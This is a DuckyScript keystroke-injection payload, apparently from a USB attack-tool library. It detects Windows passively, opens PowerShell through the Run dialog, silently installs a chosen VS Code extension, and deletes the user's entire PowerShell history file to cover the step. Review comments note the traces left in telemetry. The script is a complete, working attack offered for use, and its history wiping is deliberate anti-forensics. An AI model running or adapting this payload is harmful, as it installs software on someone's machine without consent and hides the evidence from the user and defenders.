Path: blob/master/payloads/library/execution/Install_Official_VSCode_Extension/payload.txt
REM_BLOCK
#####################################################
#                                                   #
# Title        : Install Official VSCode Extension  #
# Author       : Aleff                              #
# Version      : 1.0                                #
# Category     : Execution                          #
# Target       : Windows 10/11                      #
#                                                   #
#####################################################
END_REM

REM Replace 'publisher.extensionName' with the publisher id and extension id,
REM for instance 'Aleff.duckyscriptcookbook'. The value is pasted unchanged into
REM the command line typed at the end of this payload.
DEFINE #EXTENSION publisher.extensionName

EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    REM The wait loop below runs at most MAX_WAIT times with one CHECK_INTERVAL
    REM delay per pass, i.e. up to 150 x 20 ms = 3 s before it gives up.
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    REM Default result until the host proves otherwise.
    $_OS = #NOT_WINDOWS

    REM Poll until the host has answered the lock-LED request or the tries run out.
    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE

    REM More configuration requests than the threshold is treated as Windows.
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION

REM Keystroke section.
REM NOTE(review): $_OS is set by the extension above but is not consulted below,
REM so these keystrokes are typed whatever the detection result was; the
REM extension acts only as a boot delay here.

REM Open the Run dialog and start PowerShell from it; each fixed 1000 ms delay
REM waits for the new window before typing continues.
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000

REM One command line, three statements:
REM   1. the VS Code CLI installs the extension named by the define at the top,
REM      with the rights of the logged-in user;
REM   2. Remove-Item deletes the whole PSReadLine history file of that user,
REM      not only the entry for this command;
REM   3. exit closes the PowerShell window.
REM What stays visible on the host: the Run dialog -> PowerShell -> code process
REM chain in process-creation telemetry, the extension in 'code --list-extensions',
REM and the missing history file itself.
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit